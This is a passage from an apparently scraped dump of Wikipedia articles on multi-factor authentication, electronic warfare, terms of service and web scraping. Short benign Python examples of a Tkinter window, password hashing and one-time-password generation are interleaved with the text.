2013. Python's design and philosophy have influenced many other programming languages: Python's development practices have also been emulated by other languages. 
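As a small illustration of the Tkinter GUI support mentioned above, this minimal sketch opens a window with a button that updates a label; the widget texts are arbitrary:
import tkinter as tk

root = tk.Tk()
root.title("Tkinter demo")

label = tk.Label(root, text="Hello, Tkinter!")
label.pack(padx=20, pady=10)

def on_click():
    # Update the label text when the button is pressed.
    label.config(text="Button clicked")

tk.Button(root, text="Click me", command=on_click).pack(pady=(0, 10))

root.mainloop()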
For example, the practice of requiring a document describing the rationale for, and issues surrounding, a change to the language (in Python, a PEP) is also used in Tcl, 243 Erlang, 244 and Swift. 245 |
667 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Multi-factor_authentication | Multi-factor authentication (MFA; two-factor authentication, or 2FA, along with similar terms) is an electronic authentication method in which a user is granted access to a website or application only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. MFA protects personal data—which may include personal identification or financial assets—from being accessed by an unauthorized third party that may have been able to discover, for example, a single password. Usage of MFA has increased in recent years, however, there are numerous threats that consistently makes it hard to ensure MFA is entirely secure. 1 Authentication takes place when someone tries to log into a computer resource (such as a computer network, device, or application). The resource requires the user to supply the identity by which the user is known to the resource, along with evidence of the authenticity of the user's claim to that identity. Simple authentication requires only one such piece of evidence (factor), typically a password. For additional security, the resource may require more than one factor—multi-factor authentication, or two-factor authentication in cases where exactly two pieces of evidence are to be supplied. 2 The use of multiple authentication factors to prove one's identity is based on the premise that an unauthorized actor is unlikely to be able to supply the factors required for access. If, in an authentication attempt, at least one of the components is missing or supplied incorrectly, the user's identity is not established with sufficient certainty and access to the asset (e.g., a building, or data) being protected by multi-factor authentication then remains blocked. The authentication factors of a multi-factor authentication scheme may include: 3 An example of two-factor authentication is the withdrawing of money from an ATM; only the correct combination of a bank card (something the user possesses) and a PIN (something the user knows) allows the transaction to be carried out. Two other examples are to supplement a user-controlled password with a one-time password (OTP) or code generated or received by an authenticator (e.g. a security token or smartphone) that only the user possesses. 4 A third-party authenticator app enables two-factor authentication in a different way, usually by showing a randomly generated and constantly refreshing code which the user can use, rather than sending an SMS or using another method. 5 Knowledge factors are a form of authentication. In this form, the user is required to prove knowledge of a secret in order to authenticate. A password is a secret word or string of characters that is used for user authentication. This is the most commonly used mechanism of authentication. 3 Many multi-factor authentication techniques rely on passwords as one factor of authentication. Variations include both longer ones formed from multiple words (a passphrase) and the shorter, purely numeric, PIN commonly used for ATM access. Traditionally, passwords are expected to be memorized, but can also be written down on a hidden paper or text file. Possession factors ("something only the user has") have been used for authentication for centuries, in the form of a key to a lock. 
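A knowledge factor such as a password is normally verified against a stored, salted hash rather than kept in plain text. The sketch below uses only the Python standard library; the hash function, iteration count, and salt size are illustrative assumptions, not recommendations from the article:
import hashlib
import hmac
import os
from typing import Optional, Tuple

def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    # Derive a salted, iterated hash of the password (parameters are illustrative).
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)
    return salt, digest

def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    _, candidate = hash_password(password, salt)
    # Constant-time comparison avoids leaking information through timing.
    return hmac.compare_digest(candidate, stored_digest)

salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # True
print(verify_password("wrong guess", salt, digest))                   # False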
The basic principle is that the key embodies a secret that is shared between the lock and the key, and the same principle underlies possession factor authentication in computer systems. A security token is an example of a possession factor. Disconnected tokens have no connections to the client computer. They typically use a built-in screen to display the generated authentication data, which is manually typed in by the user. This type of token mostly uses a OTP that can only be used for that specific session. 6 Connected tokens are devices that are physically connected to the computer to be used. Those devices transmit data automatically. 7 There are a number of different types, including USB tokens, smart cards and wireless tags. 7 Increasingly, FIDO2 capable tokens, supported by the FIDO Alliance and the World Wide Web Consortium (W3C), have become popular with mainstream browser support beginning in 2015. A software token (a.k.a. soft token) is a type of two-factor authentication security device that may be used to authorize the use of computer services. Software tokens are stored on a general-purpose electronic device such as a desktop computer, laptop, PDA, or mobile phone and can be duplicated. (Contrast hardware tokens, where the credentials are stored on a dedicated hardware device and therefore cannot be duplicated, absent physical invasion of the device). A soft token may not be a device the user interacts with. Typically an X.509v3 certificate is loaded onto the device and stored securely to serve this purpose. citation needed Multi-factor authentication can also be applied in physical security systems. These physical security systems are known and commonly referred to as access control. Multi-factor authentication is typically deployed in access control systems through the use, firstly, of a physical possession (such as a fob, keycard, or QR-code displayed on a device) which acts as the identification credential, and secondly, a validation of one's identity such as facial biometrics or retinal scan. This form of multi-factor authentication is commonly referred to as facial verification or facial authentication. These are factors associated with the user, and are usually biometric methods, including fingerprint, face, 8 voice, or iris recognition. Behavioral biometrics such as keystroke dynamics can also be used. Increasingly, a fourth factor is coming into play involving the physical location of the user. While hard wired to the corporate network, a user could be allowed to login using only a pin code. Whereas if the user was off the network, entering a code from a soft token as well could be required. This could be seen as an acceptable standard where access into the office is controlled. citation needed Systems for network admission control work in similar ways where the level of network access can be contingent on the specific network a device is connected to, such as Wi-Fi vs wired connectivity. This also allows a user to move between offices and dynamically receive the same level of network access clarification needed in each. citation needed Two-factor authentication over text message was developed as early as 1996, when AT T described a system for authorizing transactions based on an exchange of codes over two-way pagers. 9 10 Many multi-factor authentication vendors offer mobile phone-based authentication. 
Some methods include push-based authentication, QR code-based authentication, one-time password authentication (event-based and time-based), and SMS-based verification. SMS-based verification suffers from some security concerns. Phones can be cloned, apps can run on several phones and cell-phone maintenance personnel can read SMS texts. Not least, cell phones can be compromised in general, meaning the phone is no longer something only the user has. The major drawback of authentication including something the user possesses is that the user must carry around the physical token (the USB stick, the bank card, the key or similar), practically at all times. Loss and theft are risks. Many organizations forbid carrying USB and electronic devices in or out of premises owing to malware and data theft risks, and most important machines do not have USB ports for the same reason. Physical tokens usually do not scale, typically requiring a new token for each new account and system. Procuring and subsequently replacing tokens of this kind involves costs. In addition, there are inherent conflicts and unavoidable trade-offs between usability and security. 11 Two-step authentication involving mobile phones and smartphones provides an alternative to dedicated physical devices. To authenticate, people can use their personal access codes to the device (i.e. something that only the individual user knows) plus a one-time-valid, dynamic passcode, typically consisting of 4 to 6 digits. The passcode can be sent to their mobile device 2 by SMS or can be generated by a one-time passcode-generator app. In both cases, the advantage of using a mobile phone is that there is no need for an additional dedicated token, as users tend to carry their mobile devices around at all times. Notwithstanding the popularity of SMS verification, security advocates have publicly criticized SMS verification, 12 and in July 2016, a United States NIST draft guideline proposed deprecating it as a form of authentication. 13 A year later NIST reinstated SMS verification as a valid authentication channel in the finalized guideline. 14 In 2016 and 2017 respectively, both Google and Apple started offering user two-step authentication with push notifications 3 as an alternative method. 15 16 Security of mobile-delivered security tokens fully depends on the mobile operator's operational security and can be easily breached by wiretapping or SIM cloning by national security agencies. 17 Advantages: Disadvantages: The Payment Card Industry (PCI) Data Security Standard, requirement 8.3, requires the use of MFA for all remote network access that originates from outside the network to a Card Data Environment (CDE). 21 Beginning with PCI-DSS version 3.2, the use of MFA is required for all administrative access to the CDE, even if the user is within a trusted network. The second Payment Services Directive requires "strong customer authentication" on most electronic payments in the European Economic Area since September 14, 2019. 22 In India, the Reserve Bank of India mandated two-factor authentication for all online transactions made using a debit or credit card using either a password or a one-time password sent over SMS. This requirement was removed in 2016 for transactions up to 2,000 after opting-in with the issuing bank. 23 Vendors such as Uber have been mandated by the bank to amend their payment processing systems in compliance with this two-factor authentication rollout. 
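The 4-to-6-digit passcodes generated by authenticator apps, as described above, are typically time-based one-time passwords. The following is a minimal sketch in the style of RFC 6238 using only the standard library; the Base32 secret shown is a made-up example, not a real credential:
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, digits: int = 6, period: int = 30) -> str:
    # Time-based one-time password: HMAC-SHA1 over the current 30-second counter,
    # followed by the dynamic truncation defined for HOTP/TOTP.
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // period
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

# Example shared secret (Base32); in practice it is provisioned once, e.g. via a QR
# code, and held by both the server and the user's authenticator app.
print(totp("JBSWY3DPEHPK3PXP"))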
24 25 26 Details for authentication for federal employees and contractors in the U.S. are defined in Homeland Security Presidential Directive 12 (HSPD 12). 27 IT regulatory standards for access to federal government systems require the use of multi-factor authentication to access sensitive IT resources, for example when logging on to network devices to perform administrative tasks 28 and when accessing any computer using a privileged login. 29 NIST Special Publication 800 63 3 discusses various forms of two-factor authentication and provides guidance on using them in business processes requiring different levels of assurance. 30 In 2005, the United States' Federal Financial Institutions Examination Council issued guidance for financial institutions recommending financial institutions conduct risk-based assessments, evaluate customer awareness programs, and develop security measures to reliably authenticate customers remotely accessing online financial services, officially recommending the use of authentication methods that depend on more than one factor (specifically, what a user knows, has, and is) to determine the user's identity. 31 In response to the publication, numerous authentication vendors began improperly promoting challenge-questions, secret images, and other knowledge-based methods as "multi-factor" authentication. Due to the resulting confusion and widespread adoption of such methods, on August 15, 2006, the FFIEC published supplemental guidelines—which state that by definition, a "true" multi-factor authentication system must use distinct instances of the three factors of authentication it had defined, and not just use multiple instances of a single factor. 32 According to proponents, multi-factor authentication could drastically reduce the incidence of online identity theft and other online fraud, because the victim's password would no longer be enough to give a thief permanent access to their information. However, many multi-factor authentication approaches remain vulnerable to phishing, 33 man-in-the-browser, and man-in-the-middle attacks. 34 Two-factor authentication in web applications are especially susceptible to phishing attacks, particularly in SMS and e-mails, and, as a response, many experts advise users not to share their verification codes with anyone, 35 and many web application providers will place an advisory in an e-mail or SMS containing a code. 36 Multi-factor authentication may be ineffective 37 against modern threats, like ATM skimming, phishing, and malware. 38 In May 2017, O2 Telef nica, a German mobile service provider, confirmed that cybercriminals had exploited SS7 vulnerabilities to bypass SMS based two-step authentication to do unauthorized withdrawals from users' bank accounts. The criminals first infected the account holder's computers in an attempt to steal their bank account credentials and phone numbers. Then the attackers purchased access to a fake telecom provider and set up a redirect for the victim's phone number to a handset controlled by them. Finally, the attackers logged into victims' online bank accounts and requested for the money on the accounts to be withdrawn to accounts owned by the criminals. SMS passcodes were routed to phone numbers controlled by the attackers and the criminals transferred the money out. 39 An increasingly common approach to defeating MFA is to bombard the user with many requests to accept a log-in, until the user eventually succumbs to the volume of requests and accepts one. 
40 Many multi-factor authentication products require users to deploy client software to make multi-factor authentication systems work. Some vendors have created separate installation packages for network login, Web access credentials, and VPN connection credentials. For such products, there may be four or five different software packages to push down to the client PC in order to make use of the token or smart card. This translates to four or five packages on which version control has to be performed, and four or five packages to check for conflicts with business applications. If access can be operated using web pages, it is possible to limit the overheads outlined above to a single application. With other multi-factor authentication technology such as hardware token products, no software must be installed by end-users. citation needed There are drawbacks to multi-factor authentication that are keeping many approaches from becoming widespread. Some users have difficulty keeping track of a hardware token or USB plug. Many users do not have the technical skills needed to install a client-side software certificate by themselves. Generally, multi-factor solutions require additional investment for implementation and costs for maintenance. Most hardware token-based systems are proprietary, and some vendors charge an annual fee per user. Deployment of hardware tokens is logistically challenging. Hardware tokens may get damaged or lost, and issuance of tokens in large industries such as banking or even within large enterprises needs to be managed. In addition to deployment costs, multi-factor authentication often carries significant additional support costs. citation needed A 2008 survey 41 of over 120 U.S. credit unions by the Credit Union Journal reported on the support costs associated with two-factor authentication. In their report, software certificates and software toolbar approaches clarification needed were reported to have the highest support costs. Research into deployments of multi-factor authentication schemes 42 has shown that one of the elements that tend to impact the adoption of such systems is the line of business of the organization that deploys the multi-factor authentication system. Examples cited include the U.S. government, which employs an elaborate system of physical tokens (which themselves are backed by robust Public Key Infrastructure), as well as private banks, which tend to prefer multi-factor authentication schemes for their customers that involve more accessible, less expensive means of identity verification, such as an app installed onto a customer-owned smartphone. Despite the variations that exist among available systems that organizations may have to choose from, once a multi-factor authentication system is deployed within an organization, it tends to remain in place, as users invariably acclimate to the presence and use of the system and embrace it over time as a normalized element of their daily process of interaction with their relevant information system. While the perception is that multi-factor authentication is within the realm of perfect security, Roger Grimes writes 43 that if not properly implemented and configured, multi-factor authentication can in fact be easily defeated. In 2013, Kim Dotcom claimed to have invented two-factor authentication in a 2000 patent, 44 and briefly threatened to sue all the major web services. However, the European Patent Office revoked his patent 45 in light of an earlier 1998 U.S. patent held by AT T. 46 |
668 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Electromagnetic_warfare | Electromagnetic warfare or electronic warfare 1 (EW) is warfare involving the use of the electromagnetic spectrum (EM spectrum) or directed energy to control the spectrum, attack an enemy, or impede enemy operations. The purpose of electromagnetic warfare is to deny the opponent the advantage of—and ensure friendly unimpeded access to—the EM spectrum. Electromagnetic warfare can be applied from air, sea, land, or space by crewed and uncrewed systems, and can target communication, radar, or other military and civilian assets. 2 3 Military operations are executed in an information environment increasingly complicated by the electromagnetic spectrum. The electromagnetic spectrum portion of the information environment is referred to as the electromagnetic environment (EME). The recognized need for military forces to have unimpeded access to and use of the electromagnetic environment creates vulnerabilities and opportunities for electronic warfare in support of military operations. 2 Within the information operations construct, EW is an element of information warfare; more specifically, it is an element of offensive and defensive counterinformation. 4 NATO has a different and arguably citation needed more encompassing and comprehensive approach to EW. 5 A military committee conceptual document from 2007, MCM 0142 Nov 2007 Military Committee Transformation Concept for Future NATO Electronic Warfare, citation needed recognised the EME as an operational maneuver space and warfighting environment domain. In NATO, EW is considered to be warfare in the EME. NATO has adopted simplified language which parallels those used in other warfighting environments like maritime, land, and air space. For example, an electronic attack (EA) is offensive use of EM energy, electronic defense (ED), and electronic surveillance (ES). The use of the traditional NATO EW terms, electronic countermeasures (ECM), electronic protective measures (EPM), and electronic support measures (ESM) has been retained as they contribute to and support electronic attack (EA), electronic defense (ED) and electronic surveillance (ES). Besides EW, other EM operations include intelligence, surveillance, target acquisition and reconnaissance (ISTAR), and signals intelligence (SIGINT). Subsequently, NATO has issued EW policy and doctrine and is addressing the other NATO defense lines of development. Primary EW activities have been developed over time to exploit the opportunities and vulnerabilities that are inherent in the physics of EM energy. Activities used in EW include electro-optical, infrared and radio frequency countermeasures; EM compatibility and deception; radio jamming, radar jamming and deception and electronic counter-countermeasures (or anti-jamming); electronic masking, probing, reconnaissance, and intelligence; electronic security; EW reprogramming; emission control; spectrum management; and wartime reserve modes. 2 4 Electronic warfare consists of three major subdivisions: electronic attack (EA), electronic protection (EP), and electronic warfare support (ES). 2 6 Electronic attack (EA), also known as electronic countermeasures (ECM), involves the offensive use of electromagnetic energy weapons, directed energy weapons, or anti-radiation weapons to attack personnel, facilities, or equipment with the intent of degrading, neutralizing, or destroying enemy combat capability including human life. 
In the case of electromagnetic energy, this action is most commonly referred to as "jamming" and can be performed on communications systems or radar systems. In the case of anti-radiation weapons, this often includes missiles or bombs that can home in on a specific signal (radio or radar) and follow that path directly to impact, thus destroying the system broadcasting. In November 2021, Israel Aerospace Industries announced a new electronic warfare system named Scorpius that can disrupt radar and communications from ships, UAVs, and missiles simultaneously and at varying distances. 7 Electronic protection (EP), also known as an electronic protective measure (EPM) or electronic counter-countermeasure (ECCM) are a measure used to protect against an electronic enemy attack (EA) or to protect against friendly forces who unintentionally deploy the equivalent of an electronic attack on friendly forces. (sometimes called EW fratricide). 8 The effectiveness of electronic protection (EP) level is the ability to counter an electronic attack (EA). Flares are often used to distract infrared homing missiles into missing their target. The use of flare rejection logic in the guidance (seeker head) of an infrared homing missile to counter an adversary's use of flares is an example of EP. While defensive EA actions (jamming) and EP (defeating jamming) both protect personnel, facilities, capabilities, and equipment, EP protects from the effects of EA (friendly and or adversary). Other examples of EP include spread spectrum technologies, the use of restricted frequency lists, emissions control (EMCON), and low observability (stealth) technology. 2 Electronic warfare self-protection (EWSP) is a suite of countermeasure systems fitted primarily to aircraft for the purpose of protecting the host from weapons fire and can include, among others: directional infrared countermeasures (DIRCM, flare systems and other forms of infrared countermeasures for protection against infrared missiles; chaff (protection against radar-guided missiles); and DRFM decoy systems (protection against radar-targeted anti-aircraft weapons). An electronic warfare tactics range (EWTR) is a practice range that provides training for personnel operating in electronic warfare. There are two examples of such ranges in Europe: one at RAF Spadeadam in the northwest county of Cumbria, England, and the Multinational Aircrew Electronic Warfare Tactics Facility Polygone range on the border between Germany and France. EWTRs are equipped with ground-based equipment to simulate electronic warfare threats that aircrew might encounter on missions. Other EW training and tactics ranges are available for ground and naval forces as well. Antifragile EW is a step beyond standard EP, occurring when a communications link being jammed actually increases in capability as a result of a jamming attack, although this is only possible under certain circumstances such as reactive forms of jamming. 9 Electronic warfare support (ES) is a subdivision of EW involving actions taken by an operational commander or operator to detect, intercept, identify, locate, and or localize sources of intended and unintended radiated electromagnetic (EM) energy. These Electronic Support Measures (ESM) aim to enable immediate threat recognition focuses on serving military service needs even in the most tactical, rugged, and extreme environments. 
This is often referred to as simply reconnaissance, although today, more common terms are intelligence, surveillance and reconnaissance (ISR) or intelligence, surveillance, target acquisition, and reconnaissance (ISTAR). The purpose is to provide immediate recognition, prioritization, and targeting of threats to battlefield commanders. 2 Signals intelligence (SIGINT), a discipline overlapping with ES, is the related process of analyzing and identifying intercepted transmissions from sources such as radio communication, mobile phones, radar, or microwave communication. SIGINT is broken into two categories: electronic intelligence (ELINT) and communications intelligence (COMINT). Analysis parameters measured in signals of these categories can include frequency, bandwidth, modulation, and polarization. The distinction between SIGINT and ES is determined by the controller of the collection assets, the information provided, and the intended purpose of the information. Electronic warfare support is conducted by assets under the operational control of a commander to provide tactical information, specifically threat prioritization, recognition, location, targeting, and avoidance. However, the same assets and resources that are tasked with ES can simultaneously collect information that meets the collection requirements for more strategic intelligence. 2 The earliest documented use of EW was during the Second Boer War of 1899 1902. The British Army, when trying to relieve Ladysmith, under siege by the Boers, used a searchlight to "bounce" Morse code signals off the clouds. The Boers immediately spotted this and used one of their own searchlights in an attempt to jam the British signals. This was graphically described by Winston Churchill in his book London to Ladysmith via Pretoria. During the Russo-Japanese War of 1904 1905 the Japanese auxiliary cruiser Shinano Maru had located the Russian Baltic Fleet in Tsushima Strait, and was communicating the fleet's location by radio signals to the Imperial Japanese Fleet HQ. The captain of the Russian warship Ural requested permission to disrupt the Japanese communications link by attempting to transmit a stronger radio signal over the Shinano Maru's signal, hoping to distort the Japanese signal at the receiving end. Russian Admiral Zinovy Rozhestvensky refused the advice and denied the Ural permission to electronically jam the enemy, which in those circumstances might have proved invaluable. The intelligence the Japanese gained ultimately led to the decisive Battle of Tsushima, where the Russian Navy lost all its battleships and most of its cruisers and destroyers. These losses effectively ended the Russo-Japanese War in Japan's favor. 10 better source needed During World War II, the Allies and Axis Powers both extensively used EW, or what Winston Churchill referred to as the "Battle of the Beams": as navigational radars were used to guide bombers to their targets and back to their base, the first application of EW in WWII was to interfere with the navigational radars. Chaff was also introduced during WWII to confuse and defeat tracking radar systems. As battlefield communication and radar technology improved, so did electronic warfare, which played a major role in several military operations during the Vietnam War. Aircraft on bombing runs and air-to-air missions often relied on EW to survive the battle, although many were defeated by Vietnamese ECCM. 
11 In 2007, an Israeli attack on a suspected Syrian nuclear site during Operation Outside the Box (or Operation Orchard) used electronic warfare systems to disrupt Syrian air defenses while Israeli jets crossed much of Syria, bombed their targets, and returned to Israel undeterred. 12 13 The target was a suspected nuclear reactor under construction near the Euphrates River, modeled after a North Korean reactor and supposedly financed with Iranian assistance. Some reports say 13 Israeli EW systems deactivated all of Syria's air defense systems for the entire period of the raid. In December 2010, the Russian Army deployed their first land-based multifunctional electronic warfare system known as Borisoglebsk 2, developed by Sozvezdie. Development of the system started in 2004 and evaluation testing successfully completed in December 2010. The Borisoglebsk 2 uses four different types clarification needed of jamming stations on a single system. The Borisoglebsk 2 system is mounted on nine MT-LB armored vehicles and is intended to suppress mobile satellite communications and satellite-based navigation signals. 14 This EW system is developed to conduct electronic reconnaissance and suppression of radio-frequency sources. 15 In August 2015, the Swedish newspaper Svenska Dagbladet said its initial usage caused concern within NATO. 16 A Russian blog described Borisoglebsk 2 thus: 17 The 'Borisoglebsk 2', when compared to its predecessors, has better technical characteristics: wider frequency bandwidth for conducting radar collection and jamming, faster scanning times of the frequency spectrum, and higher precision when identifying the location and source of radar emissions, and increased capacity for suppression. During the first two days of the 2022 Russian invasion of Ukraine, Russian EW disrupted Ukraine's air defense radars and communications, severely disrupting Ukrainian ground-based air defense systems. Russian jamming was so effective it interfered with their own communications, so efforts were scaled back. This led to Ukrainian SAMs regaining much of their effectiveness, which began inflicting significant losses on Russian aircraft by the start of March 2022. 18 Rapid Russian advances at the start of the war prevented EW troops from properly supporting the advancing troops, but by late March and April 2022, extensive jamming infrastructure had been deployed. EW complexes were set up in Donbas in concentrations of up to 10 complexes per 13 mi (21 km) of frontage. Electronic suppression of GPS and radio signals caused heavy losses of Ukrainian UAVs, depriving them of intelligence and precise artillery fire spotting. Small quadcopters had an average life expectancy of around three flights, and larger fixed-wing UAVs like the Bayraktar TB2 had a life expectancy of about six flights. By summer 2022, only some one-third of Ukrainian UAV missions could be said to have been successful, as EW had contributed to Ukraine losing 90% of the thousands of drones it had at the beginning of the invasion. 19 Russian EW capacity to disrupt GPS signals is credited with the reduction in the success of Ukrainian usage of HIMARS and JDAM bombs. The failure of GPS guidance forces these weapons, in particular JDAMS, to use inertial navigation system which reduces accuracy from around 5 metres (15 ft) down to around 27 metres (90 ft). 20 Ukraine was losing some 10,000 drones a month due to Russian electronic warfare, according to a 19 May 2023 report by the Royal United Services Institute. 
This was an average of 300 drones a day. Russia has established EW posts about every 10 kilometres (6 mi) of the front, being some 6 kilometres (4 mi) back from the front line. 21 In October 2023, The Economist reported that electronic warfare was in widespread use on front lines to impair small battlefield UAV activity, with Russia installing video feedback and control jammers on high-value equipment like tanks and artillery. 22 By 11 March 2024, Ukraine reported it had destroyed a Russian Palantin EW system in Zaporizhzhia Oblast, 23 which "suppress satellite radio navigation along the entire line of contact and in most parts of Ukraine, replacing the satellite radio navigation field (spoofing) . 24 An estimated three Palantin systems have been hit (June 2022, February 2023, and March 2024). 24 In addition to the Palantin, in Zaporizhzhia a Layer EW system was destroyed. 25 In the movie Spaceballs, an electronic attack "jams" a weapons system with a literal jar of jam. In both Top Gun: Maverick and Behind Enemy Lines, characters utilize chaff and flares from their F A 18s to confuse deflect guided missiles. citation needed Other electronic warfare systems: Historic: U.S. specific: |
669 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Terms_of_service | Terms of service (also known as terms of use and terms and conditions, commonly abbreviated as TOS or ToS, ToU or T C) are the legal agreements between a service provider and a person who wants to use that service. The person must agree to abide by the terms of service in order to use the offered service. 1 Terms of service can also be merely a disclaimer, especially regarding the use of websites. Vague language and lengthy sentences used in these terms of service have caused concerns about customer privacy and raised public awareness in many ways. A terms of service agreement is mainly used for legal purposes by companies which provide software or services, such as web browsers, e-commerce, web search engines, social media, and transport services. A legitimate terms of service agreement is legally binding and may be subject to change. 2 Companies can enforce the terms by refusing service. Customers can enforce by filing a lawsuit or arbitration case if they can show they were actually harmed by a breach of the terms. There is a heightened risk of data going astray during corporate changes, including mergers, divestitures, buyouts, downsizing, etc., when data can be transferred improperly. 3 A terms of service agreement typically contains sections pertaining to one or more of the following topics: Among 102 companies marketing genetic testing to consumers in 2014 for health purposes, 71 had publicly available terms and conditions: 4 Among 260 mass market consumer software license agreements in 2010: 5 Among the terms and conditions of 31 cloud-computing services in January-July 2010, operating in England: 6 The researchers note that rules on location and time limits may be unenforceable for consumers in many jurisdictions with consumer protections, that acceptable use policies are rarely enforced, that quick deletion is dangerous if a court later rules the termination wrongful, that local laws often require warranties (and UK forced Apple to say so). Among the 500 most-visited websites which use sign-in-wrap agreements in September 2018: 7 Among 260 mass market consumer software license agreements which existed in both 2003 and 2010: 5 A 2013 documentary called Terms and Conditions May Apply publicized issues in terms of services. It was reviewed by 54 professional critics 8 and won for Best Feature Documentary at the Newport Beach Film Festival 2013 and for Best Documentary at the Sonoma Valley Film Festival 2013. 9 Clickwrapped.com rates 15 companies on their policies and practices with respect to using users' data, disclosing users' data, amending the terms, closing users' accounts, requiring arbitration, fining users, and clarity. Terms of Service; Didn't Read is a group effort that rates 67 companies' terms of service and privacy policies, though its site says the ratings are "outdated. 10 It also has browser add-ons that deliver the ratings while at the website of a rated company. Members of the group score each clause in each terms of service document, but "the same clause can have different scores depending on the context of the services it applies to. 11 The Services tab lists companies in no apparent order, with brief notes about significant clauses from each company. In particular, competitors are not listed together so that users can compare them. A link gives longer notes. It does not typically link to the exact wording from the company. 
The Topics tab lists topics (like "Personal Data" or "Guarantee"), with brief notes from some companies about aspects of the topic. TOSBack.org, supported by the Electronic Frontier Foundation, lists changes in terms and policies sequentially, 10 per page, for 160 pages, or nearly 1,600 changes, for "many online services. 12 There does not seem to be a way to find all changes for a particular company, or even which companies were tracked in any time period. It links to Terms of Service; Didn't Read, though that typically does not have any evaluation of the most recent changes listed at TOSBack.org. Terms of services are subject to change and vary from service to service, so several initiatives exist to increase public awareness by clarifying such differences in terms, including: In 1994, the Washington Times reported that America Online (AOL) was selling detailed personal information about its subscribers to direct marketers, without notifying or asking its subscribers. That article led to the revision of AOL's terms of service three years later. On July 1, 1997, AOL posted their revised terms of service to take effect July 31, 1997, without formally notifying its users of the changes made, most notably a new policy which would grant third-party business partners, including a marketing firm, access to its members' telephone numbers. Several days before the changes were to take effect, an AOL member informed the media of the changes and the following news coverage incited a large influx of internet traffic on the AOL page which enabled users to opt out of having their names and numbers on marketing lists. 1 In 2011, George Hotz and other members of failOverflow were sued by Sony Corporation. Sony claimed that Hotz and others had committed breach of contract by violating the terms of service of the PlayStation Network and the Digital Millennium Copyright Act. 13 On December 17, 2012, Instagram and Facebook announced a change to their terms of use that caused a widespread outcry from its user base. The controversial clause stated: "you agree that a business or other entity may pay us to display your username, likeness, photos (along with any associated metadata), and or actions you take, in connection with paid or sponsored content or promotions, without any compensation to you". There was no apparent option to opt out of the changed terms of use. 14 The move garnered severe criticism from privacy advocates as well as consumers. After one day, Instagram apologized, saying that it would remove the controversial language from its terms of use. 15 Kevin Systrom, a co-founder of Instagram, responded to the controversy, stating: Our intention in updating the terms was to communicate that we’d like to experiment with innovative advertising that feels appropriate on Instagram. Instead, it was interpreted by many that we were going to sell your photos to others without any compensation. This is not true and it is our mistake that this language is confusing. To be clear: it is not our intention to sell your photos. We are working on updated language in the terms to make sure this is clear. 16 Some terms of services are worded to allow unilateral amendment, where one party can change the agreement at any time without the other party's consent. A 2012 court case In re Zappos.com, Inc., Customer Data Security Breach Litigation held that Zappos.com's terms of use, with one such clause, was unenforceable. 
17 On October 5, 2023, a 42 year-old woman named Kanokporn Tangsuan (who worked as a doctor at NYU Langone Health) was killed at Raglan Road Irish Pub at Disney Springs in Walt Disney World after going into anaphylactic shock due to increased levels of dairy and nuts in her system. Her widow, Jeffery Piccolo, filed a wrongful death lawsuit against Disney in February 2024, claiming that she had alerted staff to her severe allergy to both multiple times, but was ignored. 18 On May 31, Disney filed a motion to get the lawsuit dismissed, citing the terms of service of both the My Disney Experience app (which they booked tickets from) and Disney (which they had used a free trial of in the past). This term would require all legal disputes against Disney and its affiliates to be held in an individual binding arbitration. 19 The story's publicization in August 2024 prompted severe backlash against the Walt Disney Company, with many moving to cancel their subscriptions to Disney and for a boycott of other Disney products and services. Piccolo's legal team also argued against Disney's claims, first stating that the terms of service on both platforms were "effectively invisible", and that Piccolo "would have had no notice" of the conditions. They also argued that Piccolo's use of these services should have no effect on Tangsaun's right to be represented in this case. 19 20 Disney responded by claiming to be "deeply sorry" of the death, and that they were only defending themselves against a lawsuit towards the entire corporation. 21 As of August 15, 2024, Disney's motion is still pending, but a hearing is still scheduled to take place on October 2, 2024. 21 |
670 | https://en.wikipedia.org/wiki/Data_scraping | https://ko.wikipedia.org/wiki/%EB%8D%B0%EC%9D%B4%ED%84%B0_%EC%8A%A4%ED%81%AC%EB%A0%88%EC%9D%B4%ED%95%91 | Data scraping (Korean-language Wikipedia article): only scattered Latin fragments of the text survive, among them "data scraping", "IBM 3270", and "screen scraping". |
671 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-28 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using 